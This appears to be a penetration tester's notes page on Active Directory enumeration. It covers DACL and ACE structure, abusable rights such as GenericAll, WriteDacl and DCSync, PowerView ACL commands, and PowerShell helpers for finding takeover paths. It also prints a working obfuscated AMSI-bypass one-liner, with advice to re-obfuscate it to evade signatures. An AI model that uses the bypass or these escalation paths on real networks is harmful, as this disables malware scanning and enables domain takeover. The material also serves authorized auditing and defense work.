(UPD 2026-05-22)
[Active Directory]

Active Directory Enumeration

In this part I'll tell you about the enumeration process of an Active Directory environment.

This page will be edited as I progress in AD enumeration.

# What are access controls

To understand the attack vectors in AD we must first understand what we are actually attacking.

Misconfigured access controls are among the most common privilege escalation vectors in AD.

When a user tries to access a securable object (a shared folder, a service, an AD object such as a user or group, etc.), the authorization check happens in two steps.

  1. The user's access token, which contains the user's SID, the SIDs of the groups the user belongs to, and the user's privileges, is presented to the target object.

  2. The system compares the token against the object's DACL (Discretionary Access Control List) and grants or denies access based on the matching entries. The object's SACL (System Access Control List) does not decide access: it specifies which access attempts (successful, failed, or both) the system audits, so a request is only logged if the SACL and the audit policy say so.

# DACL

A Discretionary Access Control List consists of multiple ACEs (Access Control Entries). Each ACE has a few properties:

  • Type: Allow or Deny (Deny entries are evaluated before Allow entries)
  • Trustee: the SID of the principal the entry applies to (user, group, or computer)
  • Access mask: the rights granted or denied, for example GenericAll, WriteProperty, or ExtendedRight
  • Object type (object-specific ACEs only): a GUID that narrows the entry to one attribute, property set, or extended right, such as the member attribute or the User-Force-Change-Password right
  • Flags: whether the entry is inherited and whether it propagates to child objects

When looking at an object's ACEs (for example in PowerView's Get-ObjectAcl output), a few properties carry the useful information:

  1. ObjectDN: the Distinguished Name of the object the ACE protects
  2. IdentityReference: who holds the right (for example BUILTIN\Administrators); PowerView resolves the SID to a name
  3. ActiveDirectoryRights: the rights granted or denied on the object
  4. AccessControlType: Allow or Deny
  5. ObjectAceType (with -ResolveGUIDs): the attribute or extended right an object-specific ACE is limited to

ActiveDirectoryRights is the goldmine for useful info. Here are some rights to look out for. This list will probably expand as I learn more.


GenericAll - Full control over the object (e.g. add members to a group, or reset a user's password without knowing the current one)

GenericWrite - Write any attribute of the object (e.g. a user's logon script, or its servicePrincipalName to make the account Kerberoastable)

WriteOwner - Change the object's owner to an attacker-controlled principal; the owner can then grant itself WriteDACL and take over the object

WriteDACL - Modify the object's ACEs, e.g. grant the attacker GenericAll over the object

AllExtendedRights - All extended rights on the object. On a user this includes resetting the password (User-Force-Change-Password); on the domain object it includes the DS-Replication-Get-Changes rights needed for DCSync

ForceChangePassword - Reset the user's password without knowing the current one

Self (Self-Membership) - Add yourself to the group (a validated write to the member attribute)
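The ACE structure above and the rights list are easiest to see on a real object. The following is an added example, not code from this page or from PowerView: it reads one object's DACL through plain ADSI, the same data PowerView wraps, and flags the entries that give an escalation primitive, decoding the object-type GUIDs that distinguish ForceChangePassword, the DCSync rights and Self-Membership from a generic ExtendedRight or WriteProperty. It assumes a session on a domain-joined host with LDAP access; the Distinguished Name in the usage line is a placeholder, and the built-in principal filter is a convenience you can switch off.

```powershell
# Added example, not PowerView or page code. Enumerates the DACL of one AD object via ADSI
# and flags the ACEs that matter for privilege escalation.

# Schema / extended-right GUIDs that the ObjectType field of an object-specific ACE can carry.
$KnownGuids = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'   # group membership attribute
    '00000000-0000-0000-0000-000000000000' = 'All'      # empty GUID = the ACE covers every attribute / right
}

function Get-InterestingAce {
    param(
        [Parameter(Mandatory)][string]$DistinguishedName,
        # Hide ACEs held by built-in admin principals to cut noise; set to $false to see everything.
        [bool]$SkipBuiltin = $true
    )
    $entry = [ADSI]"LDAP://$DistinguishedName"
    # GetAccessRules(includeExplicit, includeInherited, resolve trustees to DOMAIN\name)
    $rules = $entry.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

    foreach ($ace in $rules) {
        # Deny ACEs never grant anything, so they are not escalation primitives.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $who = $ace.IdentityReference.Value
        if ($SkipBuiltin -and $who -match '^(NT AUTHORITY|BUILTIN)\\|\\(Domain Admins|Enterprise Admins|Administrators)$') { continue }

        $rights  = $ace.ActiveDirectoryRights.ToString()      # flag set, e.g. "ReadProperty, WriteProperty"
        $objType = $KnownGuids[$ace.ObjectType.ToString()]
        if (-not $objType) { $objType = $ace.ObjectType.ToString() }

        # Decide whether this ACE is a takeover primitive; first matching case wins.
        $why = switch -Regex ($rights) {
            'GenericAll'    { 'GenericAll: full control'; break }
            'WriteDacl'     { 'WriteDacl: can grant self any right'; break }
            'WriteOwner'    { 'WriteOwner: can take ownership, then add WriteDacl'; break }
            'GenericWrite'  { 'GenericWrite: can write any attribute'; break }
            'ExtendedRight' {
                if ($objType -eq 'All') { 'AllExtendedRights' }
                elseif ($objType -eq 'User-Force-Change-Password') { 'ForceChangePassword' }
                elseif ($objType -like 'DS-Replication-*') { "$objType (DCSync component)" }
                break
            }
            'WriteProperty' { if ($objType -in 'All', 'member') { "WriteProperty on $objType (can add group members)" }; break }
            'Self'          { if ($objType -in 'All', 'member') { 'Self-Membership: can add self to the group' }; break }
        }
        if ($why) {
            [pscustomobject]@{
                ObjectDN              = $DistinguishedName
                IdentityReference     = $who
                ActiveDirectoryRights = $rights
                ObjectType            = $objType
                IsInherited           = $ace.IsInherited
                Finding               = $why
            }
        }
    }
}

# Usage (placeholder DN; replace with an object from your own domain):
# Get-InterestingAce -DistinguishedName 'CN=Domain Admins,CN=Users,DC=example,DC=local' | Format-Table -AutoSize
```

The ObjectType GUID is what separates a harmless "ReadProperty, WriteProperty" on one attribute from a write to member, and a generic ExtendedRight from a password reset or DCSync right; PowerView's -ResolveGUIDs does the same lookup against the schema, which is why the raw output is hard to read without it.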

# PowerView

PowerView is a PowerShell script that, once imported, extends your PowerShell session with AD enumeration cmdlets and gives you a battleaxe against the AD.

# Quick Start

To import the script run:

Import-Module .\PowerView.ps1

If the execution policy blocks the script, start the PowerShell session with the policy set to Bypass (or dot-source the script instead of importing it).

# AMSI Bypass

If AMSI (Antimalware Scan Interface) blocks the import, there are ways to bypass it. The one-liner below is the obfuscated amsiInitFailed bypass: through reflection it sets the non-public static field amsiInitFailed of System.Management.Automation.AmsiUtils to true, so AMSI reports an initialization failure and stops scanning the session. This exact string has been circulating for years and is widely signatured now, so expect to re-obfuscate it.

For example:

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

A gist collecting AMSI bypass one-liners:

https://gist.github.com/reigningshells/a255fcca07465befbcbf4be9cdf67560

# Get ACLs of Users and Groups Objects

To enumerate an objects' access control permissions, run:

Get-ObjectAcl -SAMAccountName <object>

Filter for ACEs that grant GenericAll (ActiveDirectoryRights is a flag set, so match it instead of comparing for equality):

Get-ObjectAcl -SAMAccountName <object> | ? {$_.ActiveDirectoryRights -match "GenericAll"}

Get ACLs associated with specific prefix (OU, DC etc.):

Get-ObjectAcl -ADSprefix 'OU=SomeOU' -Verbose

Get ACLs associated with specific LDAP path:

Get-ObjectAcl -ADSpath "LDAP://<path>" -ResolveGUIDs -Verbose

Get the ADSPath of computers and groups with:

Get-NetComputer -FullData | select cn, adspath

Get-NetGroup -FullData | select cn, adspath

PowerView also has a scanner that walks the whole domain and returns ACEs with modification rights (writes, GenericAll, extended rights) held by principals whose RID is above 1000, i.e. not the built-in administrative accounts and groups:

Invoke-ACLScanner -ResolveGUIDs
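The scanner output becomes an escalation path once it is narrowed to the principals you already control. The following is an added example, not code from this page or from PowerView. It assumes PowerView.ps1 is already imported in the session, that the scanner's objects carry the ObjectDN, IdentityReference, ActiveDirectoryRights, ObjectAceType and AccessControlType fields listed above, and that the principal names you pass in are spelled the way the scanner resolves them; CORP\jdoe and CORP\Helpdesk in the usage line are placeholders.

```powershell
# Added example, not PowerView code. Assumes PowerView.ps1 is already imported.
# Narrows Invoke-ACLScanner output to Allow ACEs held by the given principals
# and to the rights that give a takeover primitive.
function Find-PrincipalAce {
    param(
        # Principal names as PowerView resolves them, e.g. 'CORP\jdoe' or 'CORP\Helpdesk' (placeholders).
        [Parameter(Mandatory)][string[]]$Principal,
        # Rights worth reporting; ActiveDirectoryRights is a flag set, so it is matched, not compared.
        [string[]]$Rights = @('GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'ExtendedRight', 'WriteProperty', 'Self')
    )
    $rightsPattern = ($Rights | ForEach-Object { [regex]::Escape($_) }) -join '|'

    Invoke-ACLScanner -ResolveGUIDs |
        Where-Object { $_.AccessControlType -eq 'Allow' } |
        Where-Object { $Principal -contains "$($_.IdentityReference)" } |
        Where-Object { "$($_.ActiveDirectoryRights)" -match $rightsPattern } |
        Select-Object ObjectDN, IdentityReference, ActiveDirectoryRights, ObjectAceType, AccessControlType |
        Sort-Object ObjectDN, IdentityReference
}

# Usage: list what jdoe and the Helpdesk group can modify, one line per ACE.
# Find-PrincipalAce -Principal 'CORP\jdoe', 'CORP\Helpdesk' | Format-Table -AutoSize
```

Pass every group the compromised user is a member of as well as the user itself; most abusable ACEs are granted to groups, and the scanner reports the trustee as written in the ACE, not the users that inherit it through membership.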

We can also search for ACLs associated with UNC path (for example: network shares):

Get-PathAcl -Path "\\dc01.isaacfletcher.local\sysvol"